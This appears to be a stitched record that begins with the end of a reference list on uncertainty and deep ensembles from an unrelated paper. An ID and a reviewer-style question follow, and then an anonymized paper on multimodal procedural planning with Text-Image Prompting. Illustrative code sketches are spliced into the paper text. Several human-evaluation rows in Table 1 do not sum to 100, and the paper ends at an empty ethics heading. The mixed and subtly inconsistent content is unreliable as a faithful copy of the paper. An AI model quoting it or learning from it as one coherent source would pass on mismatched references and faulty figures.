autonomous driving: Capture uncertainty in the deep neural network for lidar 3d vehicle detection. In *2018 21st International Conference on Intelligent Transportation Systems (ITSC)*, pp. 3266–3273. IEEE, 2018. Andrew YK Foong, Yingzhen Li, José Miguel Hernández-Lobato, and Richard E Turner. ’in-between’uncertainty in bayesian neural networks. *arXiv preprint arXiv:1906.11537*, 2019. Yarin Gal and Zoubin Ghahramani. Dropout as a bayesian approximation: Representing model uncertainty in deep learning. In *international conference on machine learning*, pp. 1050–1059. PMLR, 2016. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 770–778, 2016. S. D. Jain and K. Grauman. Active image segmentation propagation. In *2016 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 2864–2873, 2016. Siddhartha Jain, Ge Liu, Jonas Mueller, and David Gifford. Maximizing overall diversity for improved uncertainty estimates in deep ensembles. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 34, pp. 4264–4271, 2020. Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. 
In Yoshua Bengio and Yann LeCun (eds.), *3rd International Conference on Learning Representations, ICLR 2015, San Diego, CA, USA, May 7-9, 2015, Conference Track Proceedings*, 2015. Ludmila I Kuncheva and Christopher J Whitaker. Measures of diversity in classifier ensembles and their relationship with the ensemble accuracy. *Machine learning*, 51(2):181–207, 2003. Balaji Lakshminarayanan, Alexander Pritzel, and Charles Blundell. Simple and scalable predictive uncertainty estimation using deep ensembles. *Advances in neural information processing systems*, 30, 2017.
jTsnuWsda2
What can I2T-Bridge specifically correct when it is used to correct textual instructions? If the images generated by the text-to-image model are not good enough, can the images be further corrected based on the corrected text?
MULTIMODAL PROCEDURAL PLANNING VIA DUAL TEXT-IMAGE PROMPTING

Anonymous authors
Paper under double-blind review

Figure 1: Our dual Text-Image Prompting (TIP) model generates coherent and authentic multimodal procedural plans towards a high-level goal, providing useful guidelines for task completion.

ABSTRACT

Embodied agents have achieved prominent performance in following human instructions to complete tasks. However, the potential of providing instructions informed by texts and images to assist humans in completing tasks remains underexplored. To uncover this capability, we present the multimodal procedural planning (MPP) task, in which models are given a high-level goal and generate plans of paired text-image steps, providing more complementary and informative guidance than unimodal plans. The key challenges of MPP are to ensure the informativeness, temporal coherence, and accuracy of plans across modalities. To tackle this, we propose Text-Image Prompting (TIP), a dual-modality prompting method that jointly leverages the zero-shot reasoning ability of large language models (LLMs) and the compelling text-to-image generation ability of diffusion-based models. TIP improves the interaction between the dual modalities using a Text-to-Image Bridge and an Image-to-Text Bridge, allowing LLMs to guide textual-grounded image plan generation and leveraging the descriptions of the image plans to reversely ground the textual plan. To address the lack of relevant datasets, we collect WIKIPLAN and RECIPEPLAN as a testbed for MPP. Our results show compelling human preferences and automatic scores against unimodal and multimodal baselines on WIKIPLAN and RECIPEPLAN in terms of informativeness, temporal coherence, and plan accuracy. Our code and data are provided in the supplemental materials.

1 INTRODUCTION

Recent advances in embodied (Huang et al., 2022) and conversational (Qiu et al., 2021) agents have achieved prominent performance in task completion by following instructions informed by texts and images. However, to what extent models can provide useful guidelines for humans to complete a task remains underexplored. To uncover this, we propose the multimodal procedural planning task (as shown in Figure 1). The task aims to generate goal-conditioned (e.g., "How to make traditional szechuan chicken") text (e.g., "a teaspoon of light soy sauce" explains how to marinate the chicken in Step 2) and image (e.g., helping identify the ingredients "chicken, garlic, ginger, and light soy sauce" in Step 1) plans as useful guidelines to assist humans in task completion. Previous work (Huang et al., 2022) explored the generation of procedural plans in text-only form. In contrast, we generate both text and image plans, which provide guidance for performing tasks that require complementary information from multimodal contexts.

Generating plans in both text and image form poses new challenges, since the generated plans should: a) be informative enough in both the text and image modalities, b) obey commonsense temporal coherence, such as the order of steps, and c) achieve high plan accuracy, indicating the complementarity and alignment among multimodal plans. Despite significant progress in the development of large language models (LLMs) (Kojima et al., 2022; Song et al., 2022), they are unable to generate images. Existing text-to-image (T2I) models can generate high-quality images conditioned on textual instructions (Ramesh et al., 2022; Rombach et al., 2022; Brooks et al., 2022).
However, they are limited in their ability to generate images that require complex text comprehension, such as temporal reasoning (e.g., "learn basic surf safety before hitting the waves") and physical reasoning (e.g., "pick up the wine glass"). Additionally, generating text and image plans separately using LLMs and T2I models results in inconsistency and incoherence between the two modalities.

In this paper, we propose Text-Image Prompting (TIP), a novel dual-modality prompting framework that jointly leverages the capabilities of LLMs and T2I models for multimodal procedural planning. We first generate vanilla text plans by querying LLMs (Kojima et al., 2022) for step-by-step procedures. To generate textual-grounded image plans, we devise the Text-to-Image Bridge (T2I-B), which elicits the complex language comprehension abilities of LLMs to assist T2I models in generating informative and text-aligned image plans. Similarly, we generate visual-grounded text plans using the Image-to-Text Bridge (I2T-B), which verbalizes the image plans and injects them back into LLMs to assist the revision of the text plans, thereby improving informativeness. The temporal coherence of the generated plans is improved by considering the context of both text and image. Benefiting from our dual-modality prompting, our generated plans are complementary and aligned across the text and image modalities. To address the lack of suitable datasets for evaluating multimodal procedural planning, we collect the WIKIPLAN and RECIPEPLAN datasets for benchmarking the task. We empirically evaluate the effectiveness of TIP on WIKIPLAN and RECIPEPLAN in a zero-shot setting and compare it with various baselines. Our results demonstrate that TIP generates plausible multimodal plans that are informative, temporally coherent, and accurate. Our work highlights the potential of combining knowledge from LLMs and T2I models to uncover multimodal zero-shot planning capabilities. Our main contributions are as follows:

• We introduce the multimodal procedural planning task and evaluate model performance using our collected WIKIPLAN and RECIPEPLAN datasets.
• We propose Text-Image Prompting (TIP), a dual-modality prompting approach that elicits procedural knowledge jointly from LLMs and T2I models, enabling visual-grounded text plans and textual-grounded image plans.
• We show that TIP substantially improves performance in terms of textual and visual informativeness, temporal coherence, and plan accuracy in human and automatic evaluations.

Figure 2: The vanilla text plan is generated using the LLM. Our Text-Image Prompting (TIP) generates the textual-grounded image plan using the T2I-Bridge (Fig. 3) and the visual-grounded text plan using the I2T-Bridge (Fig. 5). The colors blue and green highlight the improved grounding in text and image respectively.

2 RELATED WORK

Procedural Planning This task (Zhang et al., 2020; Chang et al., 2020) has gained much attention in various areas, including robotics (Tellex et al., 2011; Jansen, 2020; Brohan et al., 2022), vision-and-language navigation (Anderson et al., 2018), conversational assistants (Ilievski et al., 2018; Qiu et al., 2021, 2022; Yang et al., 2022a), and animation (Zhao et al., 2022). Recent work extends it to multimodal scenarios (Wu et al., 2022; Song et al., 2022; Wang et al., 2022c). In this work, we explore multimodal procedural planning, which generates goal-conditioned text and image sequences grounded in a multimodal context.
Multimodal Generative Models. Recently, advanced diffusion models (Ramesh et al., 2022; Rombach et al., 2022) have shown remarkable abilities in generating high-quality images given text prompts. However, generating images with the desired semantics requires proper prompts, which often come from repeated trial and error (Liu & Chilton, 2022). To obtain more controllable generations, researchers have used large language models (LLMs) to expand input prompts with rich contextual knowledge. InstructPix2Pix (Brooks et al., 2022) combines the knowledge of GPT-3 and Stable Diffusion to generate large-scale examples of image editing as training data. In turn, recent large-scale transformer-based models (Li et al., 2022; Wang et al., 2022a) exhibit an impressive ability in image captioning, describing a given image in natural language.

Injecting Visual Knowledge into LLMs. Incorporating visual knowledge into large language models through visual imagination is a promising area of research. This can be achieved through the use of existing images as augmented visual features for language models, or through the generation of images to provide additional visual supervision to language models (Yang et al., 2022b). Studies such as Zhang et al. (2021b); Yang et al. (2022b); Zhu et al. (2022a); Lu et al. (2022b); Liu et al. (2022) have demonstrated the effectiveness of this approach. Our proposed TIP exploits image descriptions in language form to inject visual knowledge into LLMs and elicits their zero-shot reasoning ability to ground textual sentences in the verbalized visual context.

3 OUR APPROACH

3.1 Problem Definition

We formulate multimodal procedural planning as a conditional text and image sequence generation problem. Given a high-level goal $G$ in natural language form, the model generates a sequence of low-level steps $S = \{s_1, s_2, ..., s_n\}$. Each step $s_i$ in the sequence is represented by a paired text $t_i$ and image $v_i$ at timestep $i$. The text plan $\{t_1, t_2, ..., t_n\}$ and image plan $\{v_1, v_2, ..., v_n\}$ are both intended to be informative in their respective modalities and complementary across modalities. The final multimodal procedural plan $S$ is the combination of the text plan and the image plan, which together describe the procedure for completing the high-level goal.

3.2 Method Overview

We first elicit the zero-shot step-by-step reasoning ability of large language models (LLMs) to generate a vanilla text-only plan (left part of Figure 2). To enable grounding in a multimodal context, we propose Text-Image Prompting (TIP), a dual-modality prompting method (middle part of Figure 2) built upon LLMs and multimodal generative models: (1) Text-to-Image Bridge (T2I-B): we generate a visual imaginative prompt that translates the complex textual instructions (vanilla plan in Figure 3) into explicit scene descriptions (prompt in Figure 3) for text-to-image models. (2) Image-to-Text Bridge (I2T-B): we verbalize the image plan with an image captioning model to generate prompts (red highlighted template in Figure 5) that elicit the revision ability of LLMs with awareness of context. Figure 2 depicts how TIP implements multimodal procedural planning by connecting LLMs and multimodal generative models (image captioning model, text-to-image model) with our T2I-B and I2T-B, grounding the image plan in the textual context and the text plan in the visual context, respectively (right part of Figure 2).
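To make the formulation above concrete, the minimal sketch below shows one way a multimodal plan could be represented in code; the class and field names are ours for illustration and do not come from the paper's released code.

```python
# Illustrative only: a minimal representation of an MPP instance with output
# plan S = {(t_1, v_1), ..., (t_n, v_n)}; names are ours, not the paper's.
from dataclasses import dataclass, field

@dataclass
class Step:
    text: str        # t_i: the textual instruction for step i
    image_path: str  # v_i: the generated image for step i

@dataclass
class MultimodalPlan:
    goal: str                                      # the high-level goal G
    steps: list[Step] = field(default_factory=list)

plan = MultimodalPlan(goal="How to make traditional szechuan chicken")
plan.steps.append(Step("Step 1: Gather chicken, garlic, ginger, and light soy sauce.",
                       "step1.png"))
```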
### 3.3 Vanilla Text Plan Generation

We first elicit the procedural knowledge of the LLM to generate a vanilla text plan using Zero-shot Chain-of-Thought (Kojima et al., 2022), which does not require heavily human-engineered few-shot examples. Specifically, we leverage InstructGPT (Ouyang et al., 2022) to generate a goal-conditioned step-by-step procedure with the template "[TEMPLATE] Task: [GOAL]?". [TEMPLATE] represents the hand-crafted template used to extract procedural knowledge from the LLM. We extend the template "Let's think step by step" (proposed in Kojima et al. (2022)) to "What's the step-by-step procedure of" for procedural planning. We then replace the input slot [GOAL] with the given task name $T$ (the high-level goal description) to form the prompt $P$ fed into the LLM. The LLM outputs the goal-conditioned subsequent steps $W = \{t_1, t_2, ..., t_n\}$ using greedy decoding as our initial textual plan, which is conditioned only on the task name $T$ in a zero-shot manner.

### 3.4 Textual-Grounded Image Plan Generation with Text-to-Image Bridge

Our Text-to-Image Bridge (T2I-B) in Figure 3 leverages the LLM to bridge the gap between the language understanding capability of the LLM and the language-conditioned image generation ability of the text-to-image model. T2I-B elicits visual imagination in the LLM to generate an explicit scene description (imagination prompt) for the text-to-image model, conditioned on the vanilla plan.

**Imagination Prompt Generation.** We encourage the LLM to produce a revised prompt that already incorporates the physical or temporal meaning residing in the original textual plan. To achieve this, for each step, we use the prompt $P_{t2i}$ "[STEP] [T2I-B]", which concatenates the originally generated textual plan at step $i$ and the Text-to-Image Bridge template. [STEP] represents one of the subsequent steps generated by the LLM. For [T2I-B], we use a trigger sentence similar to "What do I need to draw in the picture to describe the above text?". The LLM's response to $P_{t2i}$ serves as the imagination prompt, from which the text-to-image model generates the textual-grounded image at each timestep, composing the final visual plan $V = \{v_1, v_2, ..., v_n\}$.

Figure 3: T2I-B for textual-grounded image plan.

**Text-to-Image Generation.** We exploit the Stable Diffusion (Rombach et al., 2022) model to generate RGB images at $512 \times 512$ resolution. Figure 4 provides examples of text-to-image generation with and without our T2I-B. Benefiting from the existing knowledge in LLMs, the text-to-image model is able to generate semantically relevant and high-fidelity images based on the revised prompt.

### 3.5 Visual-Grounded Text Plan Generation with Image-to-Text Bridge

To enhance the completeness, alignment, and knowledge exchange between the generated text and image plans, we propose revising the vanilla text plan using the textual-grounded image plan.

**Image Verbalization.** To do this, we first transfer the visual plan into natural language form so that it can be injected into the LLM. We implement this by generating captions for each image in the visual plan. Given the image $v$, the captioning model BLIP (Li et al., 2022) generates captions, which transfer the visual knowledge into textual descriptions.
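Below is a minimal sketch of how the vanilla-plan prompt (Section 3.3) and the T2I-B imagination prompt (Section 3.4) could be assembled. The `query_llm` and `text_to_image` callables are hypothetical stand-ins for the InstructGPT and Stable Diffusion calls; only the prompt templates are taken from the paper.

```python
# Hypothetical stand-ins: `query_llm` wraps an LLM call with greedy decoding,
# `text_to_image` wraps a diffusion model. Templates follow the paper.
TEMPLATE = "What's the step-by-step procedure of"
T2I_BRIDGE = "What do I need to draw in the picture to describe the above text?"

def vanilla_text_plan(goal: str, query_llm) -> list[str]:
    prompt = f"{TEMPLATE} Task: {goal}?"            # "[TEMPLATE] Task: [GOAL]?"
    completion = query_llm(prompt)                  # zero-shot, greedy decoding
    return [ln for ln in completion.splitlines() if ln.strip().startswith("Step")]

def textual_grounded_image_plan(steps: list[str], query_llm, text_to_image) -> list:
    images = []
    for step in steps:
        p_t2i = f"{step} {T2I_BRIDGE}"              # P_t2i = "[STEP] [T2I-B]"
        imagination_prompt = query_llm(p_t2i)       # explicit scene description
        images.append(text_to_image(imagination_prompt))  # one image per step
    return images
```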
For each generated visual plan $v_i$ at each timestep $i$, we generate a paired caption with $caption = G(v_i, Desc)$, where $Desc$ denotes the task description for unified vision-and-language models, "what does the image describe" in our case. With these image captions, we can further transfer the visual-grounded information into the LLM and revise our textual plan.

**Revision Generation.** To ground the textual plan in the visual context, we concatenate the verbalized description of the visual plan with our Image-to-Text Bridge template, which is similar to "Let's revise the procedure using the captions". Concretely, we concatenate the initial textual plan, the captions of the visual plan, and the Image-to-Text Bridge template as the prompt $P_{i2t}$ "Step-by-step Procedure: [INITIAL] Captions: [CAPTION] [I2T-B]". In this way, we elicit the reasoning ability of LLMs to ground the textual plan in the verbalized visual context, as depicted in Figure 5. As a result, our generated multimodal plan is bi-directionally grounded by connecting the abilities of LLMs and multimodal generative models. (A code sketch of this revision step follows Table 1 below.)

4 EXPERIMENTS

4.1 DATASETS

Our datasets are collected and repurposed from WikiHow[^1] and RecipeQA (Yagcioglu et al., 2018) due to the temporal relatedness among their texts and images. We collect WIKIPLAN by crawling the household "how to" articles from WikiHow and then repurposing them into a multimodal procedural planning dataset, formulating the article title as the task name and the content as the textual steps, with

[^1]: https://www.wikihow.com

Table 1: Percentages of multimodal procedural planning results of TIP that are better than, tied with, or worse than baselines, on 200 randomly sampled distinct tasks from each dataset.

| Dataset | Ours vs. Model | Textual-Informativeness | | | Visual-Informativeness | | | Temporal Coherence | | | Plan Accuracy | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| | | Win(+) | Tie | Lose(−) | Win(+) | Tie | Lose(−) | Win(+) | Tie | Lose(−) | Win(+) | Tie | Lose(−) |
| WikiPlan | Image Ref + OFA-Caption | 63.34 | 18.38 | 18.27 | 60.63 | 20.45 | 18.92 | 61.95 | 21.03 | 17.02 | 61.99 | 19.40 | 18.61 |
| | Image Ref + BLIP-Caption | 62.70 | 18.70 | 18.60 | 61.26 | 21.18 | 17.56 | 62.22 | 20.78 | 17.00 | 62.29 | 18.28 | 19.43 |
| | Text Ref + DALL·E | 62.61 | 20.34 | 17.06 | 59.88 | 22.38 | 17.74 | 60.52 | 22.08 | 17.40 | 61.19 | 22.07 | 16.74 |
| | Text-Davinci-002 + Stable-Diffusion | 62.58 | 19.32 | 17.66 | 59.66 | 20.84 | 18.50 | 60.68 | 21.98 | 16.74 | 61.67 | 21.72 | 17.72 |
| | Text-Davinci-003 + Stable-Diffusion | 62.32 | 19.82 | 17.86 | 60.29 | 20.85 | 18.85 | 61.10 | 22.17 | 16.73 | 61.48 | 20.29 | 18.23 |
| RecipePlan | Image Ref + OFA-Caption | 64.51 | 18.29 | 17.20 | 62.39 | 20.18 | 17.43 | 62.74 | 20.40 | 16.86 | 63.66 | 19.19 | 17.15 |
| | Image Ref + BLIP-Caption | 64.81 | 18.52 | 16.61 | 62.29 | 19.60 | 18.11 | 62.31 | 20.72 | 16.58 | 62.90 | 19.08 | 18.02 |
| | Text Ref + DALL·E | 61.16 | 20.15 | 17.69 | 59.60 | 20.80 | 18.04 | 60.04 | 21.34 | 18.94 | 61.11 | 18.68 | 18.68 |
| | Text Ref + Stable-Diffusion | 61.31 | 19.81 | 18.87 | 60.49 | 20.37 | 19.14 | 60.37 | 20.33 | 19.31 | 62.38 | 18.81 | 18.81 |
| | Text-Davinci-002 + Stable-Diffusion | 62.50 | 19.33 | 18.17 | 60.59 | 18.12 | 21.29 | 61.24 | 21.13 | 17.63 | 62.30 | 17.38 | 20.31 |
| | Text-Davinci-003 + Stable-Diffusion | 62.85 | 19.26 | 18.09 | 61.10 | 20.80 | 18.90 | 61.46 | 20.60 | 17.94 | 62.85 | 18.13 | 18.40 |
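Returning to the Revision Generation step described before Table 1, here is a minimal sketch of the I2T-B prompt assembly; `caption_image` (a BLIP stand-in) and `query_llm` are hypothetical helpers, and only the templates follow the paper.

```python
# Hypothetical stand-ins: `caption_image` wraps BLIP, `query_llm` wraps the LLM.
I2T_BRIDGE = "Let's revise the procedure using the captions."

def visual_grounded_text_plan(initial_steps, images, caption_image, query_llm):
    # Image verbalization: caption = G(v_i, Desc) for each image plan v_i.
    captions = [caption_image(v, "what does the image describe") for v in images]
    # P_i2t = "Step-by-step Procedure: [INITIAL] Captions: [CAPTION] [I2T-B]"
    p_i2t = ("Step-by-step Procedure: " + " ".join(initial_steps)
             + " Captions: " + " ".join(captions) + " " + I2T_BRIDGE)
    revised = query_llm(p_i2t)
    return [ln for ln in revised.splitlines() if ln.strip().startswith("Step")]
```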
the pictures as the visual steps. We collect RECIPEPLAN from the RecipeQA dataset by sequencing all the given text-image pairs as the text and image plans, respectively, with the main title as the task name. We conduct zero-shot experiments on 1,000 distinct, randomly sampled tasks from each dataset. More dataset details are in Appendix C.

Table 2: Automatic evaluations on 2,000 distinct tasks from WikiPlan and RecipePlan. Image Ref and Text Ref baselines use image and text title references from the dataset. Our TIP uses Text-Davinci-003 and Stable-Diffusion as the LLM and T2I model. We underline and bold the best score of models with and without reference baselines.

| Dataset | Model | Text Plan | | | | Image Plan | | Multimodal Plan | | | Step Length |
|---|---|---|---|---|---|---|---|---|---|---|---|
| | | WMD | S-BERT | ROUGE-L | METEOR | FID ↓ | CLIP ↑ | Cap-S | Text-S | ALL-S | Avg. |
| WikiPlan | Image Ref + BLIP-Caption | 0.78 | 0.35 | 0.06 | 0.04 | – | 0.71 | 0.36 | 0.41 | 0.39 | 8.26 |
| | Image Ref + OFA-Caption | 0.86 | 0.37 | 0.07 | 0.06 | – | 0.71 | 0.36 | 0.42 | 0.37 | 8.26 |
| | Text Ref + DALL·E | 0.68 | 0.76 | 0.28 | 0.12 | 47.39 | 0.74 | 0.33 | 0.26 | 0.29 | 8.26 |
| | Text Ref + Stable-Diffusion | 0.68 | 0.76 | 0.28 | 0.12 | 56.64 | 0.73 | 0.34 | 0.26 | 0.30 | 8.26 |
| | Text-Davinci-002 + Stable-Diffusion | 0.87 | 0.65 | 0.10 | 0.06 | 61.17 | 0.50 | 0.33 | 0.25 | 0.28 | 4.70 |
| | Text-Davinci-003 + Stable-Diffusion | 0.86 | 0.67 | 0.11 | 0.08 | 57.87 | 0.70 | 0.33 | 0.27 | 0.30 | 6.68 |
| | TIP (Ours) | 0.90 | 0.67 | 0.12 | 0.09 | 48.82 | 0.78 | 0.34 | 0.28 | 0.31 | 6.75 |
| RecipePlan | Image Ref + OFA-Caption | 0.77 | 0.37 | 0.08 | 0.05 | – | 0.64 | 0.42 | 0.56 | 0.49 | 6.93 |
| | Image Ref + BLIP-Caption | 0.82 | 0.40 | 0.09 | 0.10 | – | 0.64 | 0.43 | 0.48 | 0.46 | 6.93 |
| | Text Ref + DALL·E | 0.21 | 0.59 | 0.10 | 0.09 | 53.55 | 0.63 | 0.46 | 0.40 | 0.43 | 6.93 |
| | Text Ref + Stable-Diffusion | 0.21 | 0.59 | 0.10 | 0.09 | 54.38 | 0.61 | 0.48 | 0.40 | 0.44 | 6.93 |
| | Text-Davinci-002 + Stable-Diffusion | 0.84 | 0.63 | 0.11 | 0.10 | 60.11 | 0.49 | 0.44 | 0.33 | 0.38 | 5.17 |
| | Text-Davinci-003 + Stable-Diffusion | 0.85 | 0.68 | 0.12 | 0.13 | 60.07 | 0.73 | 0.42 | 0.35 | 0.38 | 6.82 |
| | TIP (Ours) | 0.86 | 0.68 | 0.13 | 0.14 | 58.68 | 0.79 | 0.43 | 0.36 | 0.40 | 6.94 |

4.2 Evaluation Metrics

We conduct head-to-head comparisons using the Amazon Mechanical Turk (AMT) platform (details can be found in Appendix D.1) on four aspects: (1) Textual Informativeness: the text plans contain the necessary information to complete the task; (2) Visual Informativeness: the image plans contain the necessary information to complete the task; (3) Temporal Coherence: the multimodal plans meet temporal commonsense requirements, such as the order in which the steps occur; (4) Plan Accuracy: whether referring to the multimodal plans successfully assists task completion. In addition, we measure the semantic relevance between predicted text plans and reference text plans using Word Mover's Distance (WMD) (Kusner et al., 2015), Sentence-BERT (S-BERT) (Reimers & Gurevych, 2019), ROUGE-L (Lin, 2004), and METEOR (Banerjee & Lavie, 2005). We evaluate image plans using FID (Heusel et al., 2017) and CLIPScore (Hessel et al., 2021; Radford et al., 2021).
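As a rough sketch of the S-BERT-based relevance scoring above (assuming the sentence-transformers package is available; the specific checkpoint and the procedure-level aggregation are our choices, not the paper's):

```python
# Assumes: pip install sentence-transformers; the checkpoint is our choice.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("all-MiniLM-L6-v2")

def sbert_score(predicted_plan: list[str], reference_plan: list[str]) -> float:
    """Procedure-level S-BERT similarity of a predicted plan vs. a reference."""
    pred = model.encode(" ".join(predicted_plan), convert_to_tensor=True)
    ref = model.encode(" ".join(reference_plan), convert_to_tensor=True)
    return util.cos_sim(pred, ref).item()
```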
We calculate Caption-Sentence-BERT (Cap-S) and Text-Sentence-BERT (Text-S) scores by comparing the predicted image and text plans, respectively, to the reference text using S-BERT. The average of these yields the All-Sentence-BERT (ALL-S) score for multimodal plans. Evaluations are conducted at the procedure level. More details of the evaluation can be found in Appendix D.

4.3 Baselines

As we are exploring a novel task that requires generating image and text plans conditioned on high-level goals, no existing models can be directly applied. To validate the effectiveness of our designed dual bridges, we devise several intuitive baselines for comparison (listed after Figure 6):

Table 3: Robustness check of various templates used in both the Text-to-Image Bridge and the Image-to-Text Bridge over the WikiPlan and RecipePlan datasets. The underlined templates are misleading examples. Our Text-Image Prompting model chooses the template with the best averaged multimodal alignment, highlighted in purple.

| Text-to-Image Bridge Template | Alignment | Image-to-Text Bridge Template | Alignment |
|---|---|---|---|
| What do I need to draw in the picture to describe the above text? | 0.9625 | Rewrite the textual instruction with the knowledge from visualized instruction pair-wisely. | 0.7644 |
| What do you see in the figure? | 0.9366 | Based on the visual caption, can you revise the step-by-step procedure according to the paired captions? | 0.8011 |
| Describe what the picture corresponding to the text should have. | 0.9070 | Revise each step according to the visual imagination. | 0.6921 |
| Let's think about what we need to visualize to present the above idea. | 0.8986 | Let's revise the procedure using the captions. | 0.6155 |
| Describe something irrelevant to the above text. | 0.5598 | What's the procedure that disobeys the captions? | 0.5079 |
| What do you usually draw? | 0.5350 | Provide an interesting procedure to be irrelevant with the captions. | 0.1519 |

Task: How to Juice? Step 1: Gather the necessary supplies: juicer, knife, cutting board, fruits and/or vegetables. Step 2: Wash all of the produce thoroughly. Step 3: Cut up the produce into pieces small enough to fit in your juicer's feed tube. Step 4: Turn on the juicer and begin feeding the produce through it one piece at a time. Step 5: Collect the juice in a glass or pitcher as it is produced by the machine. Step 6: Once all of your produce has been processed through your juicer, turn off and unplug it. Step 7: Discard any pulp that was collected during this process. Step 8: Enjoy your freshly made juice!

(a) Multimodal procedural plan generated by baseline Text-Davinci-003 + Stable-Diffusion.

Task: How to Juice? Step 1: Gather the necessary supplies: juicer, knife, cutting board, fruits and vegetables. Step 2: Wash all of the produce thoroughly. Step 3: Cut up the produce into pieces small enough to fit in your juicer's feed tube. Step 4: Place the cut-up pieces into a blender and blend until it becomes a liquid form. Step 5: Pour the blended mixture through your juicer's feed tube so that it can extract juice from it. Collect the juice in a glass or pitcher as it is produced by the machine. Step 6: Once all of your produce has been processed through your juicer, turn off and unplug it. Step 7: Discard any pulp that was collected during this process and brush off any excess bark from fruits or vegetables used with a toothbrush. Step 8: Enjoy your freshly made juice!
(b) Multimodal procedural plan generated by our Text-Image Prompting (TIP).

Figure 6: Improved grounding in the textual and visual contexts is highlighted in pink and green, respectively. Red text indicates reasoning about physical actions in image plan generation.

(1) ImageRef + OFA/BLIP-Caption: use the image sequences from each article/recipe as the image plan references (ImageRef), and extract captions of the image references as text plans using image captioning models (e.g., OFA or BLIP); (2) TextRef + DALL·E/Stable-Diffusion: use the titles from each article/recipe as text plan references (TextRef), and use text-to-image models (e.g., DALL·E or Stable-Diffusion) to generate image plans conditioned on the text references; (3) Text-Davinci-002/003 + Stable-Diffusion: given the high-level goal, first prompt the LLMs (e.g., Text-Davinci-002/003) to generate text plans, and then use text-to-image models to generate image plans conditioned on the text plans; (4) Text-Davinci-003 (Step-based) + Stable-Diffusion: all variants are procedure-based by default; this variant instead generates one step of the text plan at a time, iteratively. These variants use LLMs and T2I models separately, without collaboration.

4.4 Quantitative Analysis

Human Evaluation Results. We conduct a Win-Tie-Lose comparison between TIP and the baselines over WikiPlan and RecipePlan. Averaged results from 200 tasks, rated by 3 crowdsourcing workers per example, are reported in Table 1. Across all four aspects, TIP consistently receives higher preferences, outperforming the baselines with a winning ratio of over 60%. In terms of textual informativeness, the unimodal baselines (Image Ref + OFA-Caption and Image Ref + BLIP-Caption) are slightly worse than the text reference-based baselines (Text Ref + Stable-Diffusion and Text Ref + DALL·E) and the multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion). This is mainly because the other baselines either directly leverage the textual information from the reference or the rich text-based knowledge in LLMs. In terms of visual informativeness, the multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion) cannot achieve on-par results with the textual reference-based baselines. We hypothesize this is due to the lack of visual knowledge injected into the LLMs. The performance gain of TIP over the multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion) implies the importance of grounding our multimodal plans in a multimodal context.

Automatic Evaluation Results. In Table 2, TIP achieves consistent improvements over the baselines (without Ref), and even surpasses the baselines using references from the dataset on RecipePlan. This further confirms our superiority in generating multimodal plans with semantic correctness and alignment. Notice that the Text Ref baselines directly use the title from the dataset, which is a summarized version of the main content (the golden reference used in automatic evaluations).

Template Robustness. In Table 3, we compare various similar templates for T2I-B and I2T-B against misleading templates. The alignment is measured with CLIP (Radford et al., 2021) to capture the similarity between the given text/image and the conditionally generated image/text. The poor alignment of the misleading templates and the similar alignment of the various bridge templates demonstrate the robustness of the template choice in our experiments.
Single Bridge Effect. We report the effects of the Text-to-Image Bridge and the Image-to-Text Bridge of TIP in Table 4. The performance drop indicates that a text plan generated without conditioning on visual information suffers in text-only planning quality. In Table 5, we also observe that using T2I-B brings a clear improvement in both the FID score and the alignment of the image plans. These results further indicate that the key ingredient of our proposed method TIP is that the LLM and the multimodal generative models collaboratively generate multimodal procedural plans, benefiting from our designed dual bridges.

Table 4: Single-bridge ablation of TIP (average textual score).

| Model | WikiPlan (Avg. Textual) | RecipePlan (Avg. Textual) |
|---|---|---|
| w.o. T2I-B | 0.341 (−18.4%) | 0.363 (−14.1%) |
| w.o. I2T-B | 0.261 (−37.5%) | 0.273 (−35.4%) |

Step-based or Procedure-based. We compare our procedure-based method (P-Ours) against the step-based TIP (S-Ours) and the step-based Text-Davinci-003 + Stable-Diffusion (S-Base). The main difference in the step-based approach is that the plan is generated one step at a time. Since LLMs achieve promising long-text reasoning capability, we generate the full procedure for efficiency considerations. We report the head-to-head comparison results in Figure 7. The procedure-based method achieves a 60% win rate over the step-based TIP. We observe this is partially due to the tendency of LLMs to repeat input text and their difficulty in grasping the full intent of the expected generation. Thus, the procedure-based method usually achieves better planning quality from the very beginning.

4.5 Qualitative Analysis

Multimodal Grounding. In Figure 6, we compare the performance of TIP to the baselines in multimodal procedural planning. TIP generates image plans that are grounded in the textual context. With the help of LLM reasoning in the temporal dimension, we transfer this ability to image generation by conditioning on the revised prompts of the LLM. This allows the temporal and complex reasoning present in the text plan to be digested, directly indicating what needs to be depicted in the image. The highlighted steps of the image plans correctly visualize the scenes described in the textual context. For example, at Step 2, instead of only showing the vegetables, ours shows an image of a person washing the produce thoroughly. TIP also generates text plans that are better grounded in the image plan. The text plan correctly refers to the objects in the visual input, such as "liquid form" and "blended mixture", and also complements the visual context, such as "extract juice from it". Our results indicate the potential for uncovering multimodal reasoning capabilities in LLMs. We provide more comparisons on multimodal procedural planning in Appendix E.

Module Outputs. We showcase all the details of the outputs of each module for the example task "How to make a candy bouquet" in Figure 8. The T2I-B leverages the complex language comprehension and zero-shot reasoning ability of LLMs to generate the imagination prompt. This enhances the specificity of the initial plan, improving text-to-image generation. With the textual-grounded image plan, we can extract higher-quality visual information to reversely revise the text plan. More specifically, the I2T-B injects visual knowledge via verbalization of the visual plans to generate a visual-grounded and complementary textual plan. In the end, the generated image and text plans are mutually grounded. Please refer to Appendix B.2 for more module output details.
5 Conclusion and Future Work

We introduce the multimodal procedural planning task, which aims to generate goal-conditioned text and image step sequences, and benchmark models' performance with our curated testbeds WIKIPLAN and RECIPEPLAN. We propose Text-Image Prompting (TIP), a dual-modality prompting framework that connects large language models with multimodal generative models to enable plausible multimodal procedural plan generation. We hope our work sheds light on future research uncovering the capability of multimodal procedural planning, driven by unified automatic metrics.

ETHICS STATEMENT

